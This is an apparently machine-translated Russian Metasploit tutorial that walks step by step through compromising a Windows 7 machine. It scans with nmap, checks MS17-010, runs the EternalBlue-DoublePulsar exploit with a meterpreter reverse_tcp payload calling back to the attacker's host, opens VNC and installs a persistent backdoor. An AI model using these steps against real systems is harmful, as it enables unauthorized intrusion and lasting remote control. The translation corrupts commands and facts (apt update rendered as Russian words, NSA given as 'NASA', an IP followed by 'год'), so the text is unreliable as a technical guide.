метасплоит

Руководство по Metasploit

Руководство по Metasploit

Поскольку мы обсудили ТОП-25 ЛУЧШИХ ИНСТРУМЕНТОВ KALI LINUX и сначала поместили METASPLOIT в список, теперь давайте обсудим и узнаем о METASPLOIT. Мы рекомендуем вам ознакомиться с Metasploit.

Metasploit изначально был создан H. D Moore в 2003 году, пока он не был приобретен и развит Rapid7 21 октября 2009 года. Metasploit-framework полностью написан с использованием Ruby и является стандартным пакетом, установленным в системе Kali Linux (а также почти во всех ОС для тестирования на проникновение, я думаю). Это любимый комплект хакеров или тестеров на проникновение для исследования уязвимостей системы безопасности, разработки и выполнения эксплойтов для целей и других разработок в области безопасности.

Metasploit поставляется с несколькими редакциями, которые обычно делятся на две категории: бесплатная и платная версии. Бесплатные версии: Metasploit Framework Community Edition (интерфейс на основе CLI) и Armitage (интерфейс на основе графического интерфейса). Платные версии: Metasploit Express, Metasploit Pro и Cobalt Strike (аналогично Armitage, который предоставляется Strategic Cyber ​​LLC).

Metasploit позволяет пользователям создавать (или разрабатывать) собственный код эксплойтов, но не беспокойтесь, если вы не умеете кодировать, в Metasploit очень много модулей, и они постоянно обновляются. В настоящее время Metasploit имеет более 1600 эксплойтов и 500 полезных нагрузок. Простой способ понять, что такое эксплойты и полезная нагрузка, эксплойт - это в основном то, как злоумышленник доставляет полезную нагрузку через дыру уязвимости целевой системы.  Как только злоумышленник запускает эксплойт, который содержит полезную нагрузку для уязвимой цели, затем развертывается полезная нагрузка (полезная нагрузка, используемая для обратного подключения к злоумышленнику для получения удаленного доступа к целевой системе), на этом этапе эксплойт выполняется и становится неактуальным.

«Metasploit - это не инструмент для мгновенного взлома, это безумный фреймворк»

Эта статья Metasploit посвящена проведению тестирования на проникновение в целевой системе с использованием следующего потока:


ПОДГОТОВКА

Убедитесь, что в нашей Kali Linux установлена ​​последняя обновленная версия. В каждом обновлении будут улучшения. Выполните следующие команды:

~ # подходящее обновление
~ # подходящее обновление -y
~ # apt dist-upgrade -y

Как только наша машина будет обновлена, теперь давайте начнем с запуска консоли metasploit. В терминале введите:

~ # msfconsole

А также вам понадобится любой текстовый редактор, Gedit или Leafpad, чтобы собирать некоторую информацию по пути, прежде чем мы скомпилируем атаку. Во-первых, определите свой IP-адрес беспроводного интерфейса, IP-адрес маршрутизатора и сетевую маску.

Основываясь на приведенной выше информации, мы отмечаем WLAN1 и IP-адрес маршрутизатора, а также сетевую маску. Итак, записка должна выглядеть так:

IP атакующего (LHOST): 192.168.1.56
IP шлюза / маршрутизатора: 192.168.1.1
Сетевая маска: 255.255.255.0 (/ 24)


ШАГ 1: СКАНИРОВАНИЕ УЯЗВИМОСТИ

Затем в консоли metasploit мы сначала собираем информацию, такую ​​как целевой IP-адрес, операционная система, открытые порты и уязвимость. Metasploit позволяет запускать NMap прямо из консоли. На основе приведенной выше информации запустите эту команду, чтобы выполнить нашу задачу по сбору информации.

msf> nmap -v 192.168.1.1/24 - скрипт vuln -Pn -O

Из приведенной выше команды мы получили результат ниже.

У нас есть уязвимая цель, работающая под управлением операционной системы Windows, а уязвимая находится в сервисе SMBv1. Итак, добавим в примечание.

Целевой IP-адрес (RHOST): 192.168.1.57 год
Уязвимость: уязвимость удаленного выполнения кода на серверах Microsoft SMBv1 (ms17-010)


ШАГ 2: ОЦЕНКА УЯЗВИМОСТИ

Теперь мы знаем цель и ее уязвимость. Давайте проверим уязвимость в консоли metasploit

Теперь мы знаем цель и ее уязвимость. Давайте проверим уязвимость в консоли metasploit с помощью вспомогательного модуля smb_scanner. Выполните следующую команду:

msf> используйте вспомогательный / сканер / smb / smb_ms17_010
вспомогательный msf (smb_ms17_010)> установить RHOSTS [целевой IP-адрес]
вспомогательный msf (smb_ms17_010)> запустить

Metasploit уверен в уязвимости и показывает точную версию Windows OS Edition. Добавить в примечание:

Целевая ОС: Windows 7 Ultimate 7600


ШАГ 3: ЭКСПЛУАТАЦИЯ

К сожалению, у metasploit нет модуля эксплойта, связанного с этой уязвимостью. Но не волнуйтесь, снаружи есть парень, который написал код эксплойта. Эксплойт знаком, поскольку он инициирован НАСА и называется EternalBlue-DoublePulsar. Вы можете получить его здесь или следовать руководству из обучающего видео ниже, чтобы установить код эксплойта в свой фреймворк metasploit.

После того, как вы следовали приведенному выше руководству (убедитесь, что путь такой же, как в руководстве). Теперь вы готовы использовать цель. Выполните следующие команды:

используйте эксплойт / windows / smb / eternalblue_doublepulsar
установить окна полезной нагрузки / meterpreter / reverse_tcp
набор катушек PROCESSINJECTv.EXE
установить RHOST 192.168.1.57 год
установить LHOST 192.168.1.56

Использовать

Бум ... Эксплойт прошел успешно, мы получили сеанс meterpreter. Как я упоминал ранее, после запуска эксплойта он развернет полезную нагрузку, которая, как мы здесь использовали, windows /метр/ reverse_tcp.


ШАГ 4: ПОЛУЧЕНИЕ УДАЛЕННОГО ДОСТУПА

Давайте изучим более доступные команды, введите '?'(без вопросительного знака) и просмотрите список доступных команд. В Stdapi, системные команды:

Чтобы увидеть больше информации о целевой системе, используйте 'sysinfoкоманда. Результат должен выглядеть так.

Поскольку мы вводим в систему процесс раньше (spoolsv.exe), мы получили Системные привилегии. У нас есть цель. Мы можем многое сделать с помощью команды для цели. Например, мы могли бы запустить RDP или просто установить удаленный VNC. Чтобы запустить службу VNC, введите команду:

~ # запустить vnc

В результате должен получиться рабочий стол целевой машины, он выглядит так.

Самая важная часть - создать бэкдор, поэтому всякий раз, когда цель отключается от нашей машины, целевая машина будет пытаться подключиться обратно, снова к нам. Бэкдор используется для поддержания доступа, это похоже на рыбалку, вы не будете бросать рыбу обратно в воду, как только вы поймаете рыбу, верно? Вы хотите что-то сделать с рыбой, сохранить ее в холодильнике для дальнейших действий, например, приготовить или продать за деньги.

В Meterpreter есть постоянная функция бэкдора. Выполните следующую команду и посмотрите доступные параметры и аргументы.

meterpreter> запустить настойчивость -h

Если вам не нравится этот устаревший скрипт, последний модуль сохраняемости находится под сообщение / окна / управление / persistence_exe. Вы можете исследовать это самостоятельно.

Metasploit огромен, это не просто инструмент, это фреймворк, учитывая, что у него более 1600 эксплойтов и около 500 полезных нагрузок. Одна статья подходит для общей картины общего использования или идеи. Но вы так много узнали из этой статьи.

«Чем больше вы следите за потоком атаки, тем больше у вас проблем с легкостью.”

Как использовать Xdotool для стимулирования щелчков мыши и нажатия клавиш в Linux
Xdotool - это бесплатный инструмент командной строки с открытым исходным кодом для имитации щелчков мыши и нажатия клавиш. В этой статье будет краткое...
5 лучших эргономичных компьютерных мышей для Linux
Вызывает ли длительное использование компьютера боль в запястье или пальцах?? Вы страдаете от скованности суставов и постоянно должны пожимать руки? В...
Как изменить настройки мыши и сенсорной панели с помощью Xinput в Linux
Большинство дистрибутивов Linux по умолчанию поставляются с библиотекой libinput для обработки событий ввода в системе. Он может обрабатывать события ...